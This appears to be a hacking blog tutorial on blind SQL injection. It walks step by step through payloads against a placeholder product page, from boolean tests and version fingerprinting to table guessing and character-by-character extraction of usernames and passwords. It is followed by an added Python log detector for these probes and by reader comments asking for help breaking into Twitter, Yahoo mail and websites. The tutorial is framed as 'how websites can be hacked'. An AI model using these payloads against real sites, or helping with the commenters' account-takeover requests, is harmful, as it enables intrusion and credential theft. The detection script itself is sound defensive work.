In my previous articles, I showed how websites can be hacked using simple SQL injection and query-based basic SQL injection. Today I am going to explain the detailed concept of blind SQL injection. When a website is vulnerable to SQL injection but does not display any query data on its pages, we use blind SQL injection. Blind injection is a little more complicated and time-consuming, so before going into blind SQL injection you must understand basic SQL injection. It is strongly recommended that you read my previous articles before proceeding.
Here is the vulnerable link.
http://vulnerablesite.com/product.php?id=12
When we visit the URL we see a product article with a title and content.
Testing For Vulnerability
We test whether the injection is subject to a blind attack by going to the following link.
http://vulnerablesite.com/product.php?id=12 and 1=1
We should see the same URL and contents. Then try going to
http://vulnerablesite.com/product.php?id=12 and 1=2
On a successful injection you will see content missing on the page, because 1=2 is always false.
MySQL Version
http://vulnerablesite.com/product.php?id=12 and substring(@@version,1,1)=4
What I did here was get the first character of @@version and compare it to 4. If it is TRUE, the page loads normally, which means the version is 4. If any content is missing, we change the 4 to 5 and try again; this time the page loads normally with the content there, so we know we are dealing with MySQL 5.
Checking For Table Names
http://vulnerablesite.com/product.php?id=12 and (SELECT 1 from admin limit 0,1)=1
I tried guessing the table admin: if there is a table called admin, the page will load normally. Just change the table name to guess other table names. If it gives an error or content is missing, then the table doesn't exist, so try another table name.
Checking For Column Names
If you are lucky and guessed some good table names, we can now try guessing some columns within those tables.
http://vulnerablesite.com/product.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
If the column password exists, then the page loads normally; otherwise try another column name. Now let us assume that we got the table name admin and two columns, username and password. We have to pull the data from this table and these columns.
Pulling Data From Found Table/Columns
This is the part that actually takes a lot of time. We compare ASCII character codes in order to pull data, since no data will be displayed on the page.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
In the above example, I have set userid = 2 and am trying to pull the password. If the ASCII code of the first character were greater than 100, the page would load normally. In our case the page doesn't load with the content, so we know the first character is less than 100, and we guess again.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80
The page loads normally with >80: true. We go higher.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90
False, so we go lower.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86
False. We have now narrowed it down to greater than 85 but not greater than 86, so we know our number is 86! You can test by doing =86 if you want to be sure; it may be confusing at first. Using an ASCII converter we know that char(86) is 'V', so the first letter of our returned row is 'V'.
To get the next character we modify the substring.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100
I changed the substring ,1,1 to ,2,1. Now it returns the 2nd character of the subselect, 1 character in length. We do the same thing again as for the first character. This time >100 returned true, so we raise the number.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120
False, lower the 120.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110
False, lower.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105
False, lower.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103
True, higher.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104
True, so we see that it is greater than 104 and NOT greater than 105, making the number we want 105. char(105) is 'i', so we have 'Vi' so far. Keep incrementing the substring until you get to the end, where >0 will return false.
I am giving you an ASCII code chart for better understanding.
Or you can go online for the same chart from the following link.
Hope you liked this article, feel free to leave your comments for further doubts and clarifications.
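As an added example from the defender's side (not code from the original article), the Python script below shows how the probe sequence walked through above looks in a web server access log and how to flag it: it URL-decodes each request's query parameters, matches them against the shapes of the payloads shown in this article, and groups hits per client, treating a client that sends character-by-character probes and receives two distinct response sizes as using the page as a true/false oracle. The log lines, IP addresses and response sizes are constructed sample data.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Probe shapes taken from the payloads shown in this article; each is tried against the URL-decoded value of every query parameter.
PROBE_PATTERNS = [
    (re.compile(r"\band\s+\d+\s*=\s*\d+", re.I), "boolean tautology/contradiction"),
    (re.compile(r"@@version", re.I), "version fingerprint"),
    (re.compile(r"\(\s*select\b.+?\bfrom\b.+?\blimit\b", re.I | re.S), "table/column guess"),
    (re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I), "char-by-char extraction"),
]

# Common-log-format line: client IP, timestamp, request line, status, bytes sent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d{3} (?P<size>\d+)')

# Constructed sample log (not real traffic): one client walks the article's steps; the two response sizes are the true/false oracle.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /product.php?id=12%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /product.php?id=12%20and%201=2 HTTP/1.1" 200 1834',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /product.php?id=12%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /product.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))%3E100 HTTP/1.1" 200 1834',
    '203.0.113.5 - - [10/Oct/2023:13:56:35 +0000] "GET /product.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))%3E80 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:57:02 +0000] "GET /product.php?id=13 HTTP/1.1" 200 4990',
]

def classify_request(path):
    """Return the labels (in PROBE_PATTERNS order) of every probe shape found in the decoded query values."""
    hits = []
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for pattern, label in PROBE_PATTERNS:
            if label not in hits and pattern.search(value):
                hits.append(label)
    return hits

def analyse_log(lines):
    """Summarise flagged requests per client IP; blind_extraction is set when char-by-char probes got two distinct page sizes."""
    clients = defaultdict(lambda: {"probes": 0, "labels": set(), "sizes": set()})
    for line in lines:
        match = LOG_RE.match(line)
        labels = classify_request(match["path"]) if match else []
        if not labels:
            continue
        entry = clients[match["ip"]]
        entry["probes"] += 1
        entry["labels"].update(labels)
        entry["sizes"].add(int(match["size"]))
    for entry in clients.values():
        entry["blind_extraction"] = "char-by-char extraction" in entry["labels"] and len(entry["sizes"]) >= 2
    return dict(clients)
```

A single probe is not proof of an attack; the verdict rests on the repeated probe sequence from one client together with the alternating response sizes, which is what distinguishes blind extraction from an isolated scanner hit.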
Excellent one! I was searching for this for a long time. Thank you John and Srinivas :)
Hello. This is a good tutorial, but I was thinking that anyone could tell me how to hack a Twitter account that is not active, whose email is not checked and is not used anymore, because I need to recover it. Please, anyone help!!
Can this method be used for Yahoo mail?
I wanted to hack a website through SQL injection. Your articles are based on PHP, but it's not working with sit? =something, so please help me.